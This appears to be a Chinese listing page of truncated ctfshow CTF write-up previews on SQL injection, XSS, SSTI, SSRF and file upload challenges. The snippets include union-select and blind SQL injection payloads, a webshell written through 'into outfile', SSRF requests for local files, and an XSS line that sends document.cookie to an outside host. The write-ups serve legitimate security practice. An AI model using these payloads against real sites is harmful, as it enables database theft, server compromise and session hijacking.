ctfshow

ctfShow sql注入笔记

遇到了sql注入的题目,记录一下sqlmap使用过程一、手工注入测试1、简单的万能注入先测试一下用户名:admin')or1=1#/admin'and1=1#/admin'or1=1#/admin'and-1=-1....密码:123'结果没测出来,也没报错,一点反应都没有二、sqlmap工具扫描先用sqlmap跑一下,找出注入点1、将请求包写入1.txt,然后执行sqlmap-r1.txt--b
whatever`·2023-11-25 12:29

CTFShow SQL入门记录

CTFShowSQL入门记录入门级SQL注入,也作为一个学习记录吧,有150道题慢慢更新,也希望学到一些新姿势(只会用sqlmap一把梭的菜鸡)-u指定注入点–dbs跑库名–tables跑表名–columns跑字段名–dump枚举数据-D指定库-T指定表-C指定字段–random-agent每次访问切换请求头防ban–delay=1每次探测延时一秒防banweb171这里没有任何的过滤就直接常规查
paidx0·2023-11-25 12:59

CTFshow SQL

web171——常规操作~2'and1=1#2'and1=2#数据接口请求异常:parsererror2'and1=1--+回显正常,且爆出所有信息,说明“--+”其效果了。“#”这种注释方式不成功2'unionselect1,2,3---成功回显1,2,32'unionselect1,group_concat(table_name),3frominformation_schema.tablesw
王俊凯迷妹·2023-11-25 12:24

ctfshow_sql注入

文章目录WEB172WEB173WEB174web175web176WEB177总结web178web179web180web181web182_同上web183_where子句web184_右连接、内连接、having子句方法一方法二web185web186web187_md5绕过md5($password,true)的SQL注入问题web188_mysql弱比较web189-load_file
multi4·2023-11-25 12:53

ctfshow sql注入系列2

web183:代码这个就有点头大,数据库都要自己试,先把上一题的拿过来,不行倒反天罡试试,就就有了数据库的名字:ctfshow_user因为这个返回的只有1或0.那么就只能用脚本不断的去试,比如说看pass
九月一。·2023-11-25 12:21

CTFSHOW SQL注入篇(171-190)

文章目录无过滤171172173174175过滤176177178179180181182183184185|186187188189190无过滤前言下面几道无过滤的题都可以写入shell然后蚁剑连上后从数据库里面找,就统一写下做法,后面不在具体复述。具体做法如下id=0'unionselect1,""intooutfile"/var/www/html/1.php%23"有的是查询的三项所以pay
yu22x·2023-11-25 12:21

CTFSHOW SQL注入篇(191-210)

文章目录191192193|194195196197|198|199|200201202203204205|206206207208209210191把190脚本里面的ascii改成ord即可#author:yu22ximportrequestsimportstringurl="http://eb1ea450-7ad8-4a93-a682-4cdb5cf1adff.challenge.ctf.sh
yu22x·2023-11-25 12:21

CTFSHOW SQL注入篇(211-230)

文章目录211212213214215216217218219220221222223224225-230225226227228|229|230211在上题的基础上加了个空格过滤,再稍微改改刚才的脚本fromlib.core.compatimportxrangefromlib.core.enumsimportPRIORITYimportbase64__priority__=PRIORITY.LO
yu22x·2023-11-25 12:21

ctfshow sql注入系列1

这个系列题有点多,就10个一篇文章目录web171:web172:web173:web174:web175:web176:web177:web178:web179:web180:web181:web182:web171:仔细观察这个查询语句,发现有一个username!='flag',他不让我干什么,我就干什么,我给他一个拼接是id传入$sql="selectusername,passwordfr
九月一。·2023-11-25 12:51

ctfshow SQL注入Web175

查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromctfshow_user5whereusername!='flag'andid='".$_GET['id']."'limit1;";返回逻辑//检查结果是否有flagif(!preg_match('/[\x00-\x7f]/i',json_encode($ret))){$ret['msg']
墨言ink·2023-11-25 12:20

ctfshow sql注入171-187

sqli借此机会多学点sql语句,看看别人的语句是否奇妙web171$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";单引号注入1ortrue%23#url编码web1721'orderby2--+//表-1'unionselect1,(selectgroup_conc
1-1A0·2023-11-25 12:20

CTFshow sql注入 上篇(web221-253)

`目录前言题目web221(limit注入)web222(groupby注入)web223(groupby注入)web224(文件名注入)web225(堆叠注入)解法一(handle)解法二(预编译)web226,web228-web230(堆叠注入)web227(堆叠注入)web231(update注入)解法1解法2web232(update注入)web233(update注入)web234(u
Kradress·2023-11-25 12:47

ctfshow 文件上传 151-161

文件上传也好久没做了。。手很生了151前端绕过只能上传png文件使用bp抓包,修改文件名后缀为php上传成功,发现文件上传路径使用蚁剑连接找到flag152152后端校验跟上一关一样@表示后面即使执行错误,也不报错抓包修改文件后缀名蚁剑153.user.ini绕过php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.use
木…·2023-11-25 12:16

ctfshow sql

180过滤%23%23被过滤,没办法注释了,还可以用’1’='1来闭合后边。或者使用--%0c--1'%0corder%0cby%0c3--%0c--1'%0cunion%0cselect%0c1,2,database()--%0c--1'%0cunion%0cselect%0c1,2,table_name%0cfrom%0cinformation_schema.tables%0cwhere%0c
木…·2023-11-25 11:43

CTFSHOW-PHP特性

WEB89题目://里面的一般默认加引号,数字可以不用区别,但是字符串需要不然会报错但是不影响运行例如Warning:Useofundefinedconstantb-assumed'b'(thiswillthrowanErrorinafutureversionofPHP)in/Applications/phpstudy/WWW/test.phponline5string(3)"xxx"string
_Monica_·2023-11-23 05:15

一些RCE的汇总

RCE自增RCE参考[CTFshow-RCE极限大挑战官方wp]RCE-1[过滤.(]RCE-2p[自增-Array]RCE-3[自增-NAN-过滤了(和.
有点水啊·2023-11-23 05:41

【Web】preg_match绕过相关例题wp

目录①[FBCTF2019]rceservice②[ctfshow]web130③[ctfshow]web131④[NISACTF2022]middlerce简单回顾一下基础参考文章p牛神文preg_match
Z3r4y·2023-11-23 04:32

CTFSHOW】web入门 SSTI(更新中)

文章目录引言web361web362web363参考资料引言刷完SSRF、XSS,来学学SSTIweb361首先测试出get的参数名为:name。记得之前刷题时保存过一张大佬总结的测试流程图:根据图片规则进行测试:?name={{1*'4'}}返回结果:4则题目考察的很有可能是基于Jinja2的flask框架。payload:对于python3:(题目使用的是python3)使用popen函数:?
TurkeyMan·2023-11-22 15:16

ctfshow刷题 [struts2]

目录一、Web279-S2-001二、Web280--S2-005三、Web281--s2-008四、Web301-代码审计五、Web302-代码审计六、Web303-代码审计七:网鼎杯:朱雀组开启靶机八、Xss九、Web78文件包含一、Web279-S2-001题目分析:如题s2-001是一个struts2命令执行漏洞编号一、判断网站是否基于Struts2的方法1、通过网页后缀来判断,如.do.
路向阳_·2023-11-22 15:46

【Web】Ctfshow Nodejs刷题记录

①web334②web335③web336④web337⑤web338⑥web339⑦web340⑧web341⑨web342-343⑩web344①web334进来是一个登录界面下载附件,简单代码审计表单传ctfshow123456
Z3r4y·2023-11-22 15:13

ctfshow XSS刷题总结

简介这次把爪牙伸到了xss嘿嘿嘿开始日咯!web316用xss平台怎么也爆不出。。。可能是姿势不对用最原始的方法吧在自己的服务器上写一个hack.phpdocument.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?1='+document.cookieweb317今天学习了一款xss自动扫描的工具XSStrike似乎很好用的呢直接跑出
b1ue0cean·2023-11-22 15:42

CTFSHOW XSS漏洞

目录准备工作第316-333关详细说明316关317关318关319关320关-326关327关328关329关330关331关332-333关准备工作关于这个平台:CTFSHOW的XSS平台是这样的你每次提交后
貌美不及玲珑心,贤妻扶我青云志·2023-11-22 15:42

ctfshow-xss

316-326反射型期间有过滤script、img、空格、iframe的,不一一赘述,以下payload通316-326。存储型327因为要的是管理员cookie,收件人猜测填写admin,在邮件内容插入payload328管理员登录时,会看到所有用户的用户名和密码,只要注册一个带有xss代码的用户即可,当管理员访问该页面,就会执行在密码或者用户名插入payload都行,网站没有验证输入合法性。获
Vin0sen·2023-11-22 15:38

【Web】Ctfshow XSS刷题记录

目录反射型XSS①web316②web317-319③web320-322④web323-326存储型XSS①web327②web328③web329④web330⑤web331⑥web332-333反射型XSS①web316直接输入alert(1),能弹窗。xss题目一般会有个bot,可以触发你的xss代码。如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。payload:wi
Z3r4y·2023-11-22 14:05

ctfshow 摆烂杯web wp

考试前不想复(预)习,正好是ctfshow的摆烂杯,就去做了几道web题文章目录web签到黑客网站一行代码web签到题目要输入三个整数A、B、C,ABC均不可为0,让A³+B³+C³=114,刚开始还想着爆破
Lum1n0us·2023-11-21 13:29

ctfshow终极考核wp

web640web641web642web643web644web645web646web647web648web649web650web651web652web653web654web640打开页面就能看到flagctfshow{060ae7a27d203604baeb125f939570ef}web641抓取首页的包,看到有一个Flag字段ctfshow
Lum1n0us·2023-11-21 13:29

【Web】Ctfshow SSTI刷题记录1

目录①web361362-无过滤②web363-过滤单双引号③web364-过滤单双引号和args④web365-过滤中括号[]、单双引号、args⑤web366-过滤单双引号、args、中括号[]、下划线⑦web367-过滤单双引号、args、中括号[]、下划线、os⑧web368-过滤单双引号、args、中括号[]、下划线、os、{{⑨web369-过滤单双引号、args、中括号[]、下划线、
Z3r4y·2023-11-19 23:19

【Web】Ctfshow SSRF刷题记录1

核心代码解读curl_init():初始curl会话curl_setopt():会话设置curl_exec():执行curl会话,获取内容curl_close():会话关闭①web351post:url=http://127.0.0.1/flag.php或者url=file:///var/www/html/flag.php查看源码②web352-353前置知识:127.1会被解析成127.0.0.
Z3r4y·2023-11-19 15:02

【Web】文件包含+php伪协议例题wp

目录①[SWPUCTF2021新生赛]include②[SWPUCTF2021新生赛]PseudoProtocols③[BSidesCF2020]Hadabadday④文件包含一些姿势(摘自ctfshow
Z3r4y·2023-11-19 15:01

CTFshow-PWN入门-前置基础-全篇

本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDAPro、exeinfope参考博客:T1ngSh0w的博客ctfshowpwn入门|雲流のLowestWorld
Jugg_xie·2023-11-17 05:32

ctfshow SQL注入专题

哦对了,这篇文章还没写完,更新中...emmm又是好久没更新了...之后就在这里做个记录吧,有些新的思路可以做些分享web174看了一下,应该是有数字或者username=flag就不输出,主要是这个数字的限制有点烦,flag里面肯定是有数字的...网上的wp很多用的布尔盲注,不过我当时还是想直接注出来,还是有办法的。参考前面几道题,可以使用to_base64函数,对于一个字符而言,不管是数字还是
yink12138·2023-11-15 07:39

ctfshow刷题日记sql注入篇

web171没有任何过滤那应该在这张表里面,直接用1'or'1'='1即可拿到表单的所有信息(也可以直接查询)web172添加了限制条件,上面的不能用了,还是单引号闭合,直接联合查询最终payload:-1'unionselect1,(selectpasswordfromctfshow_user2whereusername=flag);--+或者直接爆他所有的内容。-1'unionselect1,
Yan9.·2023-11-15 07:39

ctfshow web入门 sql注入

无过滤注入web171查询语句$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";单引号闭合,未做任何过滤payload:1'unionselect1,group_concat(table_name),3frominformation_schema.tableswhere
S1nJa·2023-11-15 07:08

ctfshow web 入门 sql注入

171、常规题型(需要把前面数字换为-1,注释用--+)查数据库payload=“-1’unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()--+”查列名payload="-1’unionselect1,2,group_concat(column_name)f
放空 123·2023-11-15 07:08

ctfshow web入门 sql注入(持续更新)

文章目录web171web172web173web174web175web176web177web178web179web180-182web183web184web185-186web187web188web189web191web199-200web201web202web171第一题嘛,都是最基础的,单引号闭合,用联合查询注入即可。1'orderby3----1'unionselect1,2
Lum1n0us·2023-11-15 07:07

ctfshow web入门 sql注入wp(未完)

目录web171题目源码解题思路Payloadweb172题目源码解题思路Payloadweb173题目源码解题思路Payloadweb174题目源码解题思路PayloadEXPweb175题目源码解题思路Payloadweb176题目源码解题思路Payloadweb177题目源码解题思路Payloadweb178题目源码解题思路Payloadweb179题目源码解题思路Payloadweb180
久而不念·2023-11-15 07:07

CTFSHOW web入门 sql注入 无过滤注入 web171-175

目录web171web172web173web174web175web171select查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";尝试万能密码id=1'or'1'='1,进行查询,发现查询结果是数据库中全部内容,成功获得
起名字怎么这么难·2023-11-15 07:35

ctfshow web入门 sql注入(超详解)201-250

web201查询语句//拼接sql语句查找指定ID用户$sql="selectid,username,passwordfromctfshow_userwhereusername!='flag'andid='".$_GET['id']."';";返回逻辑//对传入的参数进行了过滤functionwaf($str){//代码过于简单,不宜展示}需要学会:使用--user-agent指定agent--u
Yn8rt·2023-11-15 06:33

[CTFSHOW][WEB入门] SQL注入

web171参数类型字符型SQL语句SELECT注入方式回显注入查询语句//拼接sql语句查找指定ID用户$sql="selectid,username,passwordfromctfshow_userwhereusername!='flag'andid='".$_GET['id']."'limit1;";#确定回显列数-1'unionselectNULL,NULL,NULL--+#查询当前数据库
fallingskies22·2023-11-15 06:03

ctfshow-web入门-sql

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档ctfshow-web入门-sql题目一、web171二、web172三、web173四、web174五、web175六、web176七、
林本·2023-11-15 06:03

ctfshow web入门174

题目给出了查询语句和返回逻辑先看查询语句$sql="selectusername,passwordfromctfshow_user4whereusername!='flag'andid='".$_GET['id']."'limit1;";这里能直接看出来是使用单引号进行绕过是一个字符型注入继续,查看返回逻辑if(!preg_match('/flag|[0-9]/i',json_encode($re
Jt2312·2023-11-15 06:31

ctfshow学习记录-web入门(sql注入171-180)

目录web171web172web173web174web175web176web177web178web179web180web171解答:打开页面,提供了sql语句源码,是单引号闭合。这里可以用1'and'1'='1和1'and'1'='2测试一下闭合。1'and'1'='1正常显示,1'and'1'='2不正常显示。单引号完全闭合,且不过滤空格,and等。确定列数,同时确定可回显位置,经过测
九枕·2023-11-15 06:30

ctfshow web入门 sql注入做题记录

ctfshowweb入门sql注入前言,感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-CSDN博客_ctfshowsql注入sql注入的产生:php中对数据库的操作非常简化
AshMOB·2023-11-15 06:29

ctfshow sql入门174 175脚本

因为觉得脚本写的太烂了,二分法也迷迷糊糊的主要是python怎么学的那么烂!!再研究一下174布尔盲注这是不使用二分法的importrequestsurl='http://e9a1012f-6cb2-451d-9084-0d011dfcff89.challenge.ctf.show/api/v4.php'flag=''foriinrange(60):forjinrange(32,128):payl
木…·2023-11-15 06:55

ctfshow-184 sql注入

已知条件:flag格式:ctfshow{这个字符开头。好多wp和官方视频没有解释为什么要使用$user_count=43,来做判断条件,基本不好的小白就很难受了。
yxlr_beta·2023-11-14 20:49

ctf php sql注入,CTFshow-WEB入门-SQL注入(下)(持续更新)

web227按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。
itwebber·2023-11-14 20:46

CTFshow-WEB入门-SQL注入(上)

web171无任何过滤,直接注就完事了。'unionselect1,2,group_concat(password)fromctfshow_user---web172'unionselect1,group_concat(password)fromctfshow_user2--+web173'unionselect1,2,group_concat(password)fromctfshow_user3
bfengj·2023-11-14 20:44

ctfshow- sql注入(web入门)

目录web171web172web173web174web175WEB176web177web178web179web180web181—182(180也可以用)web183web184web171简单的注入//查表名payload="1'unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_s
ZredamanJ·2023-11-14 20:43

【CTF】CTFshow-SQL注入(持续更新)

【CTF】CTFshow-SQL注入(持续更新)就剩一年的大学时光了,最近也很迷茫,想找实习,又得考托福,又想提前开始毕设,假期前又要上学校安排的实训,马上还又有一门考试,事情一堆,但又感觉整天不知道自己应该做什么
Sunny-Dog·2023-11-14 20:12

ctfshow-sql注入-超详解(172-200)

前言今天是2021/7/25,正式进入sql注入专题,目标:加强python的学习,达到通过写python脚本,加快注入速度的程度,掌握sql在php编程中的一系列查询语句。新手区可以看看Y4师傅以前记录的小笔记SQL注入之MySQL注入的学习笔记(一)SQL注入之MySQL注入学习笔记(二)2021-7-25web172、web173——hex()、to_base64()查询语句//拼接sql语
Yn8rt·2023-11-14 20:42
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他